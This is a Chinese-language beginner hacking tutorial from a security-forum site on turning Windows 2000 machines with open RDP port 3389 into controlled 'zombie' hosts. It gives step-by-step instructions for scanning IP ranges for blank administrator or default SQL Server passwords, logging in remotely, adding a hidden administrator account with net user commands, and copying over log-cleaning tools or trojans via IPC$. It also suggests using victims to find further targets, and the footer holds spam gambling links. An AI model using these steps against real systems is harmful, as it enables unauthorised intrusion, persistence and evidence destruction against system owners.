歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

建立你的3389肉雞(菜鳥篇)

來源:陳十三哥 作者:不詳 時間:2005-05-28 TAG: 我要投稿
 

在當今世界上,電腦信息網絡使人們得以在國內各地乃至全球范圍內交換各種各樣的信息,正所謂“足不出戶能知天下事”。在目前全球性電腦信息網絡中,最為成功和覆蓋面最大、信息資源最豐富的當屬

現在有輸入法漏洞的機器已不多了,除非你遇見的是一個極不負責任的網管,呵呵!~這篇教程就是教你不用輸入法漏洞就能用終端服務連接上開3389的機器,使它成為你的肉雞。(下面的人要注意啊,不要搞國內的機器,我用來做示范的是臺灣的機器,為何要用臺灣的呢?等一下就知道啦)先做一下準備活動,呵呵!何為準備活動?就是找到要用的工具呀。(操作系統要求win2000/NT) 
一.X-scan-v1.0,強大的掃描工具,簡單易用,沒有IP限制,呵呵?想到什么了? 
二.WIN2000終端服務客戶端(沒這個怎么叫3389肉雞呢?) 
三.CleanIISLog.exe,榕哥的清日志的好東東!^o^(又買廣告呢) 
四.SQLEXEC.EXE 
好!武器都準備好了就動手吧! 
一。運行X-scan-v1.0工具包中的xscan_gui.exe,這是一個圖形界面的掃描器,在“掃描設置”下選擇“標準端口”;“NT弱口令用戶”;“SQL-SERVER默認帳戶”這三項,“運行參數”下填上你要掃描的IP地址段,例如:211.**.1.1-211.**.20.255(選的范圍不要太大,要不很長時間都掃不完,也不要太少,少了可能找不到肉雞),盡量不要選下面的“使用代理服務器”,線程要看你的網速如何,快的可以填50線程,我一般是用50的!YEAH!~~在“掃描前先PING主機”打上鉤,“X-SCANNER所在位置”用默認的.\xscan.exe就可以了。再來“其他設置”下,“配置文件”處是.\dat\config.ini,點擊旁邊的“讀取設置”,看到這個面板的框框都有東西了,就表示設置好!回到開始時的“掃描設置”面板下,點擊下方的“開始掃描”。見到一個DOS窗口出來了,掃描正式開始!^O^,去泡泡MM吧,天南地北的吹一通,呵呵,看到掃描全部完成了,和你的MM說拜拜咯,開工~! 
看看掃描的報告,可能會很多的,一定要看清楚哦,要不肉雞可能就這樣給飛走啦。找找看,(主要是找有NT弱口令帳戶又同時開了3389的機器)我就找到了一個例子:(不是真的哦,別照這個去試) 

211.**.**.53: 【詳細資料】 【主機摘要 -- 域名/主機名:"快辣僥" 操作系統:"Windows NT 5.0"】 

NT弱口令帳戶:1 開放端口:135,139,3389 
看到了嗎?NT弱口令帳戶:1 開放端口:135,139,3389,。。。。。。。。! 
好了,再點“詳細資料”進去看看: 
【NT弱口令用戶】: 


Administrator: [空口令] 
帳戶類型:管理員(Administrator) 
最后登錄時間: GMT 
錯誤口令次數: 0次 
成功登錄次數: 9次 
用戶ID: 0x000001f4, 組ID: 0x00000201 
歡呼吧,。。。。。。。ㄈ绻吹健霸敿氋Y料”里的帳戶類型不是管理員的話,就找下一個吧,反正掃描報告多得很,總會找到一個的,我就試過掃描一次,就掃到了十多個這樣的帳戶,呵呵!~~) 
知道了管理員的帳戶是:Administrator,口令是空!到這時候,這臺NT主機已差不多可以說是你的啦!

二.運行你的終端服務客戶端,填上這個IP,按“連接”,等一下就看到了熟悉的WIN2000終端登陸界面,好,填上用戶名:Administrator,口令不用填啦,按“確定”,等一下,哈哈。。。!進去啦~~~~你會先看到一個叫你設定伺服器的畫面,關掉,不要了。想干什么?首先我們為了防止管理員以后改了密碼,我們先要給自己做一個管理員的帳戶,點對方屏幕的開始--》程序--》附件--》命令提示符(這里的字有時是不同的,要看具體是什么系統,自己好好看看吧),依次輸入: 
C:\>net user owem lgg1234 /add(加入一個用戶名為owem,密碼:lgg1314的帳戶) 
指令執行成功!
C:\>net localgroup administrators owem /add(把owem加入到管理員組) 
指令執行成功!
好了!到這里你已增加了一個管理員了,以后就算他把Administrator的密碼改了你也可以用owem這個帳戶進去耍啦,建議你先用net user看看人家的管理組有多少人,人多的話就盡管加個號吧,人少的加號時就要找一個近似于對方的名字來迷惑管理員,哈哈~`夠絕了吧! 
再來,在自己的命令提示符下依次輸入: 
D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道連接上去) 
命令成功完成!
D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到對方對方C盤下,有時會拒絕訪問的,就拷到其他目錄下吧) 
已復制 1 個文件!
你也可以把木馬拷上去,哈哈!~~~有意思!5555555555..... 
再來刪除IPC的連接 
D:\hacker>net use \\211.**.**.53\ipc$ /delete 
\\211.**.**.53\ipc$ 已經刪除!
先去看看管理員在不在,開始--》程序--》系統管理工具--》終端服務管理員,哈哈!`~沒在!爽極啦,只有你一個連線! 
下面該玩點什么呢?打開他的瀏覽器,去你知道的黑軟地址下載你想用的工具,什么?裝個流光?哈哈!~~`目標太大了吧?還是下個X-SCAN算了,下個IP炸彈??呵呵!好主意,`炸你的情敵去吧!用他下載的X-SCAN幫你去找更多的肉雞!1YEAH!如果你在上面運行了程序,你退出時就只關終端窗口右上角的X就行了,關掉后你的程序還在運行呢!明天睡醒了來收你的戰果吧!如果你要全部退出,就按開始--》關機--》登出****(你的帳戶)!

還要補充的就是如果你掃到的是:SQL-SERVER默認帳戶,沒有NT管理員弱口令,但3389還是開了的話,就可以用SQLEXEC。EXE來連接上去,建立帳戶也是用一樣的命令,你也可以用3389登陸上去啦。

【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 在线配资平台哪家好 北京11选五最大遗漏 甘肃十一选五今天开奖号码 中原风采22选5走势图 定位胆五分彩 深圳股票融资公司 河北快三走势 天津十一选五开奖走势图 安徽15选5开奖号码走势图 3u娱乐城真钱百家乐